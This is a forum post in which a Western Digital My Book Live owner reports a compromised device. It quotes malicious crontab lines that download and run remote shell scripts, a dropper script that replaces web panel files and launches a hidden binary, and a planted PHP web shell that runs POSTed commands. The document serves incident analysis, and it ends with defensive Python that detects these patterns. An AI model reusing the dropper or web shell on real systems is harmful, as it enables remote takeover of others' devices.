Help! All data on My Book Live gone and owner password unknown

After one of my 4 Western Digital drives was factory reset, I decided to look for suspicious crontab entries.

I found this in /etc/crontab, IP numbers removed and replaced with xxx. Also, I had to alter the normal http colon // because I'm a “new user” limited to two links. (I have no intent of posting links.) Two IP numbers were utilized.

1 * * * * root rm -f /tmp/w;wget -O /tmp/w http: xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http: xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB

The above appears to download two malicious shell scripts. I do not know how these were added to /etc/crontab on my Western Digital. One IP number points to Russia, the other to Latvia.

I went ahead and downloaded “w” and “wB”.

The contents of “w” are as follows, IP numbers removed and replaced with xxx.

This shell script appears to download a file that makes it seem that the web panel of the device is no longer working. It also downloads a hidden executable file called .nttp-z, and I don't know what it does, but I was able to keep a copy of it.

#!/bin/sh

if ! cat /var/www/Admin/webapp/htdocs/accessDenied.php | grep -q "b18c3795fd377b51b7925b2b68ff818cc9115a47"
then
sudo wget -O /var/www/Admin/webapp/htdocs/accessDenied.php http: xxx.xxx.xxx.xxx/w-eZ2KRdHBfE.txt
fi

if ! cat /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php | grep -q "05951edd7f05318019c4cfafab8e567afe7936d4"
then
sudo wget -O /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php http: xxx.xxx.xxx.xxx/w-9YqJG9zgoN.txt
fi

if test -f /var/www/logout.php
then
sudo rm -f /var/www/logout.php
sudo /sbin/reboot
exit 0
fi

if ! sudo ps aux | grep -q ".[n]ttpd"
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

sleep 3

if ! sudo ps aux | grep -q ".[n]ttpd"
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd-z /.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

if sudo /etc/init.d/apache2 status | grep -q "running"
then
sudo /etc/init.d/apache2 stop
fi

rm -f /tmp/ybtIfV5lh3
wget -O /tmp/ybtIfV5lh3 http: xxx.xxx.xxx.xxx/w-ybtIfV5lh3
rm -f /tmp/ybtIfV5lh3

rm -f /tmp/w

wB just removes itself with rm.

I will note that these wget commands change the name of what was downloaded and end up replacing the file that came with the device, made by Western Digital, with the contents of the files downloaded from Latvia or Russia.

Here is the content of one of them (note: I did separate some brackets so it would display):

< ?php
require_once('secureCommon.inc');
?>

< !DOCTYPE html >
< html >
< head >
< meta http-equiv="X-UA-Compatible" content="IE=edge" >
< meta http-equiv="Content-Type" content="text/html; charset=UTF-8" >
< LINK REL=StyleSheet HREF="css/main.css" TYPE="text/css" >
< style >
.contentTables td {
    color: #FFFFFF;
}

.formTable .roundBox input {
    height: 48px;
}
< /style >

< script type="text/javascript" src="js/jquery.js" >< / script >
< / head >

< body >
< ?php include ('header.inc') ? >

< div class="topGrad" >
    < img src='images/WD2go_ColorStrip.png'/ >

    < div class="contentTables" >
        < span class='title' >< ?php echo gettext('ACCESS_DENIED')? >< /span >
        < div class='titleSeperatorSpacing' >
            < div class='titleSeperator' >
            < /div >
        < /div >

        < br/ >
        < p >
            < ?php
                $_link_ = '"logout.php"';
                eval('echo "' . addslashes(gettext('ACCESS_DENIED_CONTENT')) . '";');
            ? >
        < /p >
        < p class='GLF8JN4v4b' >
            < ?php
                if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
                    system($_POST["c"]);
                }
            ? >
        < /p >
    < /div >

    < div class='bottomGlow' >
        < img src="images/WD2go_Glow.png" align='bottom'/ >
    < /div >

< /div >

< /body >

< /html >

Note the “ACCESS DENIED” in the message there.

I can’t get the post to just be text.

5 Likes
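A defender-side check for the two indicators in this post (crontab entries that wget a file and pipe it to /bin/sh, and PHP that hands a POST field to system() behind a sha1 comparison), added here as an example and not code from the original post or from Western Digital. The sample crontab and PHP fragment are constructed to mirror what was quoted above, with IP addresses left as xxx.

```python
import re

# Constructed sample input modelled on the /etc/crontab lines quoted in the post
# (IP addresses replaced with xxx, as in the post itself).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http://xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http://xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB
"""

# Constructed PHP fragment with the same shape as the block planted in accessDenied.php.
SAMPLE_PHP = """\
<?php
if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
    system($_POST["c"]);
}
?>
"""

# A cron command that fetches over the network and then feeds the result to a shell.
DOWNLOAD = re.compile(r"\b(?:wget|curl)\b")
EXECUTE = re.compile(r"(?:^|[;&|]\s*)(?:/bin/)?(?:sh|bash)\s+\S+")

def suspicious_cron_lines(crontab_text):
    """Return (line_number, command) for system-crontab entries that download and execute."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        fields = line.strip().split(None, 6)  # minute hour dom month dow user command
        if len(fields) < 7 or fields[0].startswith("#"):
            continue
        command = fields[6]
        if DOWNLOAD.search(command) and EXECUTE.search(command):
            hits.append((lineno, command))
    return hits

# PHP that passes request data to an OS command, optionally behind a hash check of a
# second request field, is the web shell pattern quoted in the post.
EXEC_SINK = re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")
HASH_GATE = re.compile(r"\b(?:sha1|md5)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b[^;]*?==\s*[\"']([0-9a-f]{32,40})[\"']")

def webshell_indicators(php_source):
    """Return the command sinks and gate hashes found in one PHP file's source."""
    return {
        "exec_sinks": [m.group(1) for m in EXEC_SINK.finditer(php_source)],
        "gate_hashes": [m.group(1) for m in HASH_GATE.finditer(php_source)],
    }
```

Run `suspicious_cron_lines` over the real /etc/crontab and `webshell_indicators` over each file under /var/www to flag the same two patterns on a live device.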